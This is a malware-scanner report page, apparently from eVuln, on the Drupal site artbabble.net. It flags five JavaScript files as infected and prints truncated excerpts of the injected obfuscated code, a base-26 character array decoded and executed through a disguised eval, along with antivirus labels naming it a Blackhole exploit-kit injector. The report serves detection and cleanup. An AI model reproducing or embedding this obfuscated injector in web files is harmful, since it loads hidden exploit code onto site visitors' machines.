Malware Scanner report for artbabble.net

Malicious/Suspicious/Total urls checked: 5/0/15

5 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "artbabble.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=artbabble.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://artbabble.net/	200 OK Content-Length: 26943 Content-Type: text/html	clean
http://artbabble.net/sites/all/modules/jquery_update/replace/jquery.min.js?Y	200 OK Content-Length: 55749 Content-Type: application/x-javascript	clean
http://artbabble.net/misc/drupal.js?Y	200 OK Content-Length: 9780 Content-Type: application/x-javascript	clean
http://artbabble.net/sites/all/modules/fivestar/js/fivestar.js?Y	200 OK Content-Length: 16336 Content-Type: application/x-javascript	clean
http://artbabble.net/sites/all/modules/google_analytics/googleanalytics.js?Y	200 OK Content-Length: 2268 Content-Type: application/x-javascript	clean
http://artbabble.net/sites/all/modules/panels/js/panels.js?Y	200 OK Content-Length: 729 Content-Type: application/x-javascript	clean
http://artbabble.net/sites/all/modules/thickbox/thickbox.js?Y	200 OK Content-Length: 18237 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) Drupal.behaviors.initThickbox = function (context) { $('a,area,input', context).filter('.thickbox:not(.initThickbox-processed)').addClass('initThickbox-processed').click(function() { var t = this.title \|\| this.name \|\| null; var a = this.href \|\| this.alt; var g = this.rel \|\| false; tb_show(t,a,g); this.blur(); return false; }); }; function tb_show(caption, url, imageGroup) { var settings = Drupal.settings.thickbox; t ... 3262 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-603!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Iframe-XL [Trj] Ad-Aware Trojan.JS.Agent.IJG Ikarus Virus.HTML.Framer nProtect Trojan.JS.Agent.IJG TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA Emsisoft Trojan.JS.Agent.IJG (B) CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn MicroWorld-eScan Trojan.JS.Agent.IJG Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Blackhole.bekghp F-Secure Trojan.JS.Agent.IJG VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Norman Blacole.WD GData Trojan.JS.Agent.IJG Symantec JS.Runfore BitDefender Trojan.JS.Agent.IJG
http://artbabble.net/sites/all/modules/extlink/extlink.js?Y	200 OK Content-Length: 7848 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function ($) { function extlinkAttach(context) { var pattern = /^(([^\/:]+?\.))([^\.:]{4,})((\.[a-z]{1,4}))(:[0-9]{1,5})?$/; var host = window.location.host.replace(pattern, '$3$4'); var subdomain = window.location.host.replace(pattern, '$1'); if (Drupal.settings.extlink.extSubdomains) { var subdomains = "([^/]*\\.)?"; } else if (subdomain == 'www.' \|\| subdomain == '') { var subdomains = "(www\\.)?"; } else { var ... 3220 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-603!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Iframe-XL [Trj] Ad-Aware Trojan.JS.Agent.IJG Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Agent.IJG TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA Emsisoft Trojan.JS.Agent.IJG (B) CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn MicroWorld-eScan Trojan.JS.Agent.IJG Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Blackhole.bekghp F-Secure Trojan.JS.Agent.IJG VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Norman Blacole.WD GData Trojan.JS.Agent.IJG Symantec JS.Runfore BitDefender Trojan.JS.Agent.IJG
http://artbabble.net/sites/all/modules/views/js/base.js?Y	200 OK Content-Length: 3493 Content-Type: application/x-javascript	clean
http://artbabble.net/sites/all/modules/views/js/ajax_view.js?Y	200 OK Content-Length: 6789 Content-Type: application/x-javascript	clean
http://artbabble.net/sites/all/modules/jquery_ui/jquery.ui/ui/minified/ui.core.min.js?Y	200 OK Content-Length: 8100 Content-Type: application/x-javascript	clean
http://artbabble.net/sites/all/modules/jquery_ui/jquery.ui/ui/minified/ui.tabs.min.js?Y	200 OK Content-Length: 9352 Content-Type: application/x-javascript	clean
http://artbabble.net/sites/default/themes/babblicious/js/page-front.js?Y	200 OK Content-Length: 4516 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('#block-views-recent_videos-block_1,' + '#block-views-popular_videos-block_1') .insertAfter('#video-lists') .wrapAll('<div id="home-video-tabs"></div>'); $('#video-lists ul.nav').tabs({ selected: 0, fx: { opacity: 'toggle', duration: 'fast' } }); if (($.browser.msie && $.browser.v ... 3580 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-603!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Iframe-XL [Trj] Ad-Aware Trojan.JS.Agent.IJG Ikarus Virus.HTML.Framer nProtect Trojan.JS.Agent.IJG TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA Emsisoft Trojan.JS.Agent.IJG (B) CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn MicroWorld-eScan Trojan.JS.Agent.IJG Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Blackhole.bekghp F-Secure Trojan.JS.Agent.IJG VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Norman Blacole.WD GData Trojan.JS.Agent.IJG Symantec JS.Runfore BitDefender Trojan.JS.Agent.IJG
http://artbabble.net/sites/default/themes/babblicious/js/babble-utils.js?Y	200 OK Content-Length: 4225 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function babble_ajax_post(url, data_type, success_func, error_message) { $.ajax({ type: 'POST', url: Drupal.settings.basePath + url, cache: false, dataType: data_type, error: function(XMLHttpRequest, textStatus, errorThrown) { alert('Error: ' + error_message); }, success: function(data, textStatus) { if (data) { success_func(data); } else { alert(error_message); } }, timeo ... 3244 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-603!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Iframe-XL [Trj] Ad-Aware Trojan.JS.Agent.IJG Ikarus Trojan-Downloader.JS.Agent nProtect Trojan.JS.Agent.IJG TrendMicro-HouseCall JS_BLACOLE.SMAP Comodo TrojWare.JS.Blacole.YA Emsisoft Trojan.JS.Agent.IJG (B) CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky Trojan-Downloader.JS.Agent.gvn MicroWorld-eScan Trojan.JS.Agent.IJG Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Blackhole.bekghp F-Secure Trojan.JS.Agent.IJG VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Norman Blacole.WD GData Trojan.JS.Agent.IJG Symantec JS.Runfore BitDefender Trojan.JS.Agent.IJG
http://artbabble.net/sites/default/themes/babblicious/js/flashembed.js?Y	200 OK Content-Length: 12348 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function() { var jQ = typeof jQuery == 'function'; function isDomReady() { if (domReady.done) { return false; } var d = document; if (d && d.getElementsByTagName && d.getElementById && d.body) { clearInterval(domReady.timer); domReady.timer = null; for (var i = 0; i < domReady.ready.length; i++) { domReady.ready[i].call(); } domReady.ready = null; domReady.done ... 3407 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-603!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports: AntiVir JS/BlacoleRef.CM Avast JS:Iframe-XL [Trj] Ad-Aware Trojan.JS.Agent.IJG Bkav MW.Clod3bb.Trojan.d517 Ikarus Virus.HTML.Framer nProtect Trojan.JS.Agent.IJG TrendMicro-HouseCall JS_BLACOLE.SMAP Emsisoft Trojan.JS.Agent.IJG (B) Comodo TrojWare.JS.Blacole.YA CAT-QuickHeal JS/BlacoleRef.CN K7GW Exploit ( 04c55c671 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro JS_BLACOLE.SMAP Microsoft Trojan:JS/BlacoleRef.CM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.JS.Agent.IJG Fortinet JS/Blacole.HT!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Blackhole.bekghp F-Secure Trojan.JS.Agent.IJG VIPRE Trojan.JS.BlacoleRef.cm (v) AVG HTML/Framer Norman Blacole.WD GData Trojan.JS.Agent.IJG Symantec JS.Runfore BitDefender Trojan.JS.Agent.IJG

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: artbabble.net

Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Connection: close
Date: Thu, 18 Dec 2014 22:51:12 GMT
ETag: "773aeeb1c18c504f108c80659ecb1d1c"
Server: Apache/2.2.9 (Fedora)
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 26 Apr 2014 07:14:08 GMT
Set-Cookie: SESS6859c340c32cd0e93a1d1a37b9996c7d=7fa5ha74h6qjvd8e5auv6kji15; expires=Sun, 11-Jan-2015 02:24:32 GMT; path=/; domain=.artbabble.net
X-Powered-By: PHP/5.2.17 ZendServer/5.0

Second query (visit from search engine):
GET / HTTP/1.1
Host: artbabble.net
Referer: http://www.google.com/search?q=artbabble.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for artbabble.net

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools